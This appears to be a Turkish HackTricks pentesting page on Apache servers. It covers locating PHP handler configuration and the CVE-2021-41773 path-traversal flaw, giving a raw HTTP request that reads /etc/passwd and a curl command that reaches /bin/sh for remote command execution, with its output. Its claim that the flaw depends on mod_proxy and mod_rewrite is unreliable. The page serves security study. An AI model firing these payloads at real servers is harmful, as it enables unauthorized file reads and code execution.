hacktricks/network-services-pentesting/pentesting-web/apache.md
2024-02-10 18:14:16 +00:00

4 KiB
Raw Blame History

AWS hackleme becerilerini sıfırdan kahraman seviyesine öğrenin htARTE (HackTricks AWS Kırmızı Takım Uzmanı)!

HackTricks'ı desteklemenin diğer yolları:

Yürütülebilir PHP uzantıları

Apache sunucusunun hangi uzantıları yürüttüğünü kontrol edin. Bunları aramak için aşağıdaki komutu çalıştırabilirsiniz:

grep -R -B1 "httpd-php" /etc/apache2

Ayrıca, bu yapılandırmayı bulabileceğiniz bazı yerler şunlardır:

/etc/apache2/mods-available/php5.conf
/etc/apache2/mods-enabled/php5.conf
/etc/apache2/mods-available/php7.3.conf
/etc/apache2/mods-enabled/php7.3.conf

CVE-2021-41773

Bu, Apache HTTP Sunucusu'nun 2.4.49 sürümünde bulunan bir güvenlik açığıdır. Bu açık, hedef sunucuda bir dosya okuma saldırısına izin verir.

ık Detayları

Bu güvenlik açığı, hedef sunucuda mod_proxy ve mod_rewrite modüllerinin etkin olduğu durumlarda ortaya çıkar. Saldırgan, hedef sunucuya özel olarak oluşturulmuş bir HTTP isteği göndererek, sunucunun dosya sistemine erişim sağlayabilir.

Saldırı Senaryosu

Saldırgan, hedef sunucuya aşağıdaki gibi bir HTTP isteği göndererek saldırıyı gerçekleştirebilir:

GET /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1
Host: example.com

Bu istek, sunucunun /etc/passwd dosyasını okumasına neden olur. Saldırgan, bu şekilde hassas bilgilere erişebilir.

Önlem

Bu güvenlik açığından korunmak için Apache HTTP Sunucusu'nun en son sürümüne güncellenmelidir. Ayrıca, mod_proxy ve mod_rewrite modüllerinin gereksiz yere etkinleştirilmemesi önemlidir.

curl http://172.18.0.15/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh --data 'echo Content-Type: text/plain; echo; id; uname'
uid=1(daemon) gid=1(daemon) groups=1(daemon)
Linux
AWS hacklemeyi sıfırdan kahraman seviyesine öğrenin htARTE (HackTricks AWS Kırmızı Takım Uzmanı)!

HackTricks'ı desteklemenin diğer yolları: